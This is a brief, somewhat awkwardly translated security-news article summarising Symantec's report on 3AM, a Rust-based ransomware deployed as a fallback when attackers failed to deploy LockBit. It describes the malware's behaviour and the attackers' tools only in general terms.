A new ransomware family called 3AM emerges in the threat world
September 13, 2023
3AM is a new type of ransomware discovered in a single incident in which attackers failed to deploy LockBit ransomware to targeted infrastructure.
Symantec’s Threat Hunter team has discovered a new ransomware family calling itself 3AM. This ransomware family has so far only been deployed in one incident where attackers failed to deploy his LockBit ransomware.
The attackers were able to successfully deploy the ransomware to three computers on the target organization’s network, but it was blocked on two of those three computers.
3AM is a new ransomware written in Rust. Before starting the encryption process, the ransomware attempts to stop several services. Once the file has been encrypted, an attempt is made to delete the volume shadow (VSS) copy. The malware adds the extension .threeamtime to the filename of encrypted files. Researchers have not yet determined whether the attackers behind 3AM are affiliated with known cybercrime groups.
The attacker was discovered using the post-exploitation tool Cobalt Strike and attempted to execute reconnaissance commands (whoami, netstat, quser, net share) for lateral movement. The exact entry route used in the attack is unknown.
The attacker attempted to maintain persistence by adding new users and used the Wput tool to extract files to their own FTP server.
This ransomware is a 64-bit executable file that supports multiple commands to stop applications running backup and security software.
This malware only encrypts files that match predefined criteria.
Below is the 3am Tor “support” portal that operators use to negotiate ransom demands with victims.
“Ransomware companies are becoming increasingly independent from ransomware operators; This is not the first time Symantec has observed attackers attempting to deploy two types of ransomware. In one blow. ” conclusion Report. “New ransomware families emerge frequently, but most die out quickly or fail to gain much attention. However, the fact that 3AM was used as a fallback by LockBit affiliates suggests that it This suggests it may be of interest to attackers and may be seen again in the future.”
Follow us on Twitter: @securityaffairs and Facebook and mastodon
(Security related matters – hacking, ransomware)